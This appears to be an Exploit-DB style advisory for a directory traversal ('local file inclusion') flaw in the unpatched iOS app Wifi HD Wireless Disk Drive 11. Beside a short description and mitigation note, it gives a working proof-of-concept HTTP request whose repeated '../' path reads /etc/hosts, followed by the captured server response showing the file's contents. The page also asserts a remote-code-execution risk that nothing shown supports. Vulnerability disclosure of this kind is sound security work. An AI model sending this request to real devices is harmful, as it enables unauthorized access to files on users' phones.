Wifi HD Wireless Disk Drive 11 - Local File Inclusion

vendor:

Wifi HD Wireless Disk Drive

by:

Chokri Hammedi

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Wifi HD Wireless Disk Drive

Affected Version From: 11

Affected Version To: 11

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: iPhone OS 15_5

2022

Wifi HD Wireless Disk Drive 11 – Local File Inclusion

The exploit allows an attacker to include local files on the server by manipulating the file path in the HTTP request. This can lead to unauthorized access to sensitive information or remote code execution.

Mitigation:

The vendor should sanitize user input and validate file paths to prevent directory traversal attacks. It is recommended to update to a patched version if available.

Source

Exploit-DB raw data:

# Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion
# Date: Aug 13, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://www.savysoda.com
# Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976
# Version: 11
# Tested on: iPhone OS 15_5

# Proof of Concept
GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.1.100
Connection: close
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)
AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5  Safari/604.1
Referer: http://192.168.1.103/
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate


-----------------

HTTP/1.1 200 OK
Content-Disposition: attachment
Content-Type: application/download
Content-Length: 213
Accept-Ranges: bytes
Date: Sat, 13 Aug 2022 03:33:30 GMT

##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting.  Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1             localhost